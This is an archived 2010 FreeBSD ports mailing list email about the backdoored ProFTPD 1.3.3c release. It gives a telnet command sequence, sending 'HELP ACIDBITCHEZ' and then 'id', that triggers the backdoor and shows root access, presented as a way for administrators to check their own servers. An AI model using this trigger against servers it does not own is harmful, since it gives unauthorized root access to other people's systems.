From owner-freebsd-ports@FreeBSD.ORG  Thu Dec  2 21:49:17 2010
Return-Path: <owner-freebsd-ports@FreeBSD.ORG>
Delivered-To: freebsd-ports@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id 43D54106566C
	for <freebsd-ports@freebsd.org>; Thu,  2 Dec 2010 21:49:17 +0000 (UTC)
	(envelope-from fidaj@ukr.net)
Received: from fsm1.ukr.net (fsm1.ukr.net [195.214.192.23])
	by mx1.freebsd.org (Postfix) with ESMTP id 02F238FC0A
	for <freebsd-ports@freebsd.org>; Thu,  2 Dec 2010 21:49:16 +0000 (UTC)
Received: from 47-39-132-95.pool.ukrtel.net ([95.132.39.47] helo=localhost)
	by fsm1.ukr.net with esmtps ID 1POH1f-000ATL-OG
	for freebsd-ports@freebsd.org; Thu, 02 Dec 2010 23:49:16 +0200
Date: Thu, 2 Dec 2010 23:49:14 +0200
From: Ivan Klymenko <fidaj@ukr.net>
To: freebsd-ports@freebsd.org
Message-ID: <20101202234914.26e53500@ukr.net>
In-Reply-To: <20101202232206.66c672a1@ukr.net>
References: <20101202232206.66c672a1@ukr.net>
X-Mailer: Claws Mail 3.7.6 (GTK+ 2.20.1; amd64-portbld-freebsd9.0)
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Subject: Re: ftp/proftpd 1.3.3c with a version which contained a backdoor.
X-BeenThere: freebsd-ports@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Porting software to FreeBSD <freebsd-ports.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-ports>,
	<mailto:freebsd-ports-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-ports>
List-Post: <mailto:freebsd-ports@freebsd.org>
List-Help: <mailto:freebsd-ports-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-ports>,
	<mailto:freebsd-ports-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Thu, 02 Dec 2010 21:49:17 -0000

=D0=92 Thu, 2 Dec 2010 23:22:06 +0200
Ivan Klymenko <fidaj@ukr.net> =D0=BF=D0=B8=D1=88=D0=B5=D1=82:

> Hello, people!
> What do you think is it worth to pay attention to these events:
> http://sourceforge.net/mailarchive/message.php?msg_name=3Dalpine.DEB.2.00=
.1012011542220.12930%40familiar.castaglia.org
>=20
> and that in this case needs to be done with the port ftp/proftpd
> itself?
>=20
> Thanks!

Check vulnerability of your server, you can by using the following
command sequence:

$ telnet 1.2.3.4 21
   Trying 1.2.3.4...
   Connected to 1.2.3.4
   Escape character is '^]'.
   220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [1.2.3.4]
   =20
   HELP ACIDBITCHEZ
=20
   id ;
=20
   uid=3D0(root) gid=3D0(root) groups=3D0(root),65534(nogroup)